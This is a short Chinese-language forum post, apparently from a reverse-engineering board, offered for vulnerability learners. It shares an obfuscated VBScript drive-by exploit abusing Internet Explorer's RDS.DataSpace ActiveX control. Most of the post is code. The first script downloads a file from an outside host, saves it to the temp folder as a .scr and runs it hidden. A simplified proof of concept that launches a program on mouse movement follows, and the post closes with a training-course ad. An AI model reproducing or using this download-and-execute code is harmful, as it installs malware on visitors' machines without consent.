只适合处学漏洞者看.
原VBS混沌过
<script language="VBScript">
1
2 on error resume next
//木马top.css
3 justurl = "http://wm.eo2q.cn/root/top.css"
4 eeeeee="cls"+"i"+"d:B"+""+""+"D96"
5 qq3222933="obj"+"ect"
6 easl="C556-65A3-"
7 just2="classid"
8 wertxxx=eeeeee & easl &"11D0-983A-00C04FC29E36"
9 just3="Micr"+"osoft.XMLHTTP"
10 just4="Shell.App"+"lication"
11 just5="Scrip"+"ting.File"+"SystemObject"
12 Set rootealsi = document.createElement(qq3222933)
13 sub usicecod(just4,rootjust)
14 set justendif = rootealsi.createobject(just4,"")
15 justendif.ShellExEcutE rootkit,"","","open",0
16 end sub
17 rootealsi.setAttribute just2, wertxxx
18 chilam=just3
19 Set xiaozi = rootealsi.CreateObject(chilam,"")
20 User="andhi"
21 justxxxx="eam"
22 justxxx="Str"
23 justxx="Adodb."
24 queryeset = justxx & justxxx & justxxxx
25 fuckavast = queryeset
26 set justav360 = rootealsi.createobject(fuckavast,"")
27 justav360.type = 1
28 fuckavavav="GET"
29 xiaozi.Open fuckavavav, justurl, False
30 xiaozi.Send
31 rootkit="justju.sCr"
32 SeT shaduav = rootealsi.createobject(just5,"")
33 sET justendif = shaduav.GetSpecialFolder(2)
34 justav360.open
35 rootkit= shaduav.BuildPath(justendif,rootkit)
36 justav360.write xiaozi.responseBody
37 justav360.savetofile rootkit,2
38 justav360.close
39 call usicecod(just4,rootjust)
40
</script>
新VBS
<HTML>
<HEAD><TITLE>Report mouse moves</TITLE>
<SCRIPT LANGUAGE="VBScript">
sub reportMove()
set virusobj = document.createElement("object")
//RDS.DataSpace 漏洞利用点很有意思(Element->变为一RDSOBJ)
virusobj.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
set run = virusobj.createObject("Shell.Application","")
run.ShellExecute "iexplore.exe","","","open",1
end sub
</SCRIPT>
<BODY onmousemove="reportMove()">
<H1>Welcome!</H1>
</BODY>
</HTML>
打过补定的IE会报意外错误.真正的漏洞触发点还没研究过.
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)